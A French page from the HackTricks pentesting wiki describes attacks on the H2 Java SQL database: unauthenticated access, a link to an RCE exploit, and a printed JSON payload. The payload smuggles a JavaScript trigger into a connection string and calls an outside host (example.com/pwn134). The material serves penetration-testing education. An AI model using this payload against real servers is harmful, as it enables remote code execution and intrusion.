Français - Ht
HackTricks Training Twitter Linkedin Sponsor

H2 - Java SQL database

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Page officielle : https://www.h2database.com/html/main.html

Accès

Vous pouvez indiquer un nom de base de données inexistant afin de créer une nouvelle base de données sans identifiants valides (non authentifié):

Ou si vous savez par exemple qu'un mysql est en cours d'exécution et que vous connaissez le nom de la base de données et les identifiants pour cette base de données, vous pouvez simplement y accéder :

Astuce de la boîte Hawk de HTB.

RCE

En ayant accès pour communiquer avec la base de données H2, vérifiez cet exploit pour obtenir une RCE dessus : https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

Injection SQL H2 vers RCE

Dans cet article, une charge utile est expliquée pour obtenir une RCE via une base de données H2 en exploitant une injection SQL.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks:

PrécédentGraphQLSuivantIIS - Internet Information Services

Dernière mise à jour